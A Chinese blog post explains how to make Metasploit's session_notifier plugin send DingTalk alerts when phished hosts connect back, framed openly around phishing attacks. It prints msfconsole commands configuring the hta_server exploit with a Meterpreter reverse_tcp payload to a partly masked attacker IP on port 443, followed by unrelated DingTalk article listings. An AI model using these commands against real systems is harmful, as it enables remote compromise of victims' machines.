Metasploit主机上线钉钉通知

简介: Metasploit主机上线钉钉通知

0x01 前言

我们在进行钓鱼攻击被动提权时可能需要在MSF长期监听某个端口,等待管理员执行上线,但又不可能随时都盯着监听界面,这样就不能及时得知是否有新主机上线,是不是很不方便呢?

最近在metasploit-framework项目中看到安恒@三米前有蕉皮老哥提交的“钉钉通知”拉取请求,现已被rapid7合并到了session_notifier会话通知插件中。


0x01 钉钉机器人webhook配置

我们先在钉钉官网下载Windows客户端并注册一个用户进行登录,然后发起一个群组并在群设置中的智能助手里添加一个自定义机器人。

机器人的名称可以随便取,在安全设置中添加一个自定义关键字“session”,这是一个不能修改的固定值



0x02 session_notifier插件配置

msfconole命令进入MSF后先用load加载session_notifier插件,将set_session_dingtalk_webhook设置为我们钉钉机器人中的Webhook,然后用start_session_notifier命令开启会话通知即可。

    root@:kali~# msfconsole -q
    msf6 > load session_notifier
    msf6 > set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=
    msf6 > start_session_notifier


    SessionNotifier Commands:

      restart_session_notifier        //重新启动会话通知
      save_session_notifier_settings  //将所有会话通知设置保存到框架
      set_session_dingtalk_webhook    //设置DingTalk会话通知(关键字: session)
      set_session_maximum_ip          //设置会话通知最大IP范围
      set_session_minimum_ip          //设置会话通知最小IP范围
      set_session_mobile_carrier      //设置手机的移动运营商
      set_session_mobile_number       //设置您要通知的10位手机号码
      set_session_smtp_address        //设置会话通知SMTP地址
      set_session_smtp_from           //设置SMTP发件人
      set_session_smtp_password       //设置SMTP密码
      set_session_smtp_port           //设置会话通知SMTP端口
      set_session_smtp_username       //设置SMTP用户名
      start_session_notifier          //开始会话通知
      stop_session_notifier           //停止会话通知

      随便设置了一个hta_server监听模块来测试一下看是否能够实时收到新上线主机的通知。

        msf6 > use exploit/windows/misc/hta_server 
        msf6 exploit(windows/misc/hta_server) > set target 1
        msf6 exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
        msf6 exploit(windows/misc/hta_server) > set lhost 39.**.*.238
        msf6 exploit(windows/misc/hta_server) > set lport 443
        msf6 exploit(windows/misc/hta_server) > exploit


        这里我们可以看到钉钉群组里已经成功收到了机器人发送过来的新上线主机通知信息!

        相关文章
        |
        7月前
        |
        数据可视化 数据挖掘 Serverless
        数据推送上线 ,抢先体验,欢迎来用! 支持钉钉!
        大多数业务都会有定期推送业务信息至钉钉、飞书、Teams 群的需求,有些信息要推三个群、要推两个群、有些信息要 at 人、有些要当天、有些要当月,不旦要管理多个推送的 Webhook,还要管理推送的内容、监控推送是否生效等等,DataWorks 新推出的数据推送能减轻以上问题,还能助力快速完成推送内容开发,支持规范的上线流程。
        131 5
        |
        7月前
        |
        安全 机器人 数据安全/隐私保护
        Metasploit主机上线钉钉通知
        Metasploit主机上线钉钉通知
        52 0
        |
        存储 安全 机器人
        新一代企业操作系统:专属钉钉解决方案全新上线
        阿里云专属钉钉解决方案正式发布,通过阿里云产品,进一步深化钉钉在组织在线、沟通在线、协同在线、业务在线、生态在线上的能力,成为企业全新一代的安全、高效的企业数字化操作系统。
        新一代企业操作系统:专属钉钉解决方案全新上线
        |
        安全 机器人
        阿里云钉钉上线专属解决方案 助力800万保险代理人疫情期工作
        阿里云钉钉上线专属解决方案 助力800万保险代理人疫情期工作
        阿里云钉钉上线专属解决方案 助力800万保险代理人疫情期工作
        |
        运维 安全 数据管理
        钉钉宜搭发布版本更新:同步钉钉角色、上线行业解决方案馆、支持附件在线编辑等
        4月15日钉钉宜搭进行了版本更新,新增五个功能,同时对一些已有的功能进行了优化升级。
        7642 0
        钉钉宜搭发布版本更新:同步钉钉角色、上线行业解决方案馆、支持附件在线编辑等
        |
        移动开发 运维 Cloud Native
        Duang,您的钉钉应用已上线!云开发5分钟快速打造钉钉会议室预定系统
        5分钟可以干什么?喝一杯咖啡,回一封邮件,还是开发上线一个钉钉应用。云开发平台联合钉钉开发平台推出0门槛打造你的第一个钉钉应用的活动,完成相应任务后,即可领取精美奖品。春暖花开,领个背包去踏春吧!
        500 0
        Duang,您的钉钉应用已上线!云开发5分钟快速打造钉钉会议室预定系统
        |
        移动开发 小程序 API
        免费下载 | 秒变钉钉应用开发达人!《钉钉应用开发者速成手册》独家上线
        钉钉开发者认证官方课程,钉钉开放平台零基础入门,从框架原理到开发调试,7天手把手带你掌握钉钉典型应用开发!
        17572 0
        免费下载 | 秒变钉钉应用开发达人!《钉钉应用开发者速成手册》独家上线
        |
        API 开发者
        钉钉开发者教程专区正式上线
        “教程专区”让开发者从零开始创建应用,提供钉钉基础入门的搭建及API实战的交互式步骤详解
        350 0
        钉钉开发者教程专区正式上线
        |
        弹性计算 运维 监控
        ECS钉钉工作台上线啦,等你来体验哦!
        ECS钉钉工作台已上线,通过移动端钉钉APP就可以便捷完成ECS购买,随时随地查看实例、磁盘及安全组详情,简直不要太轻松。另外,还有贴心的阿里小云钉钉消息机器人陪在您身边。它能实时推送事件告警提醒,让您第一时间发现问题立即解决。您还可以通过阿里小云一键唤起人工服务,沟通咨询更快捷。悄悄告诉你,未来的阿里小云还会上线更多功能,敬请期待...
        34316 0
        |
        存储 弹性计算 安全
        成功案例-钉钉 | 学习笔记
        快速学习 成功案例-钉钉
        404 0

        热门文章

        最新文章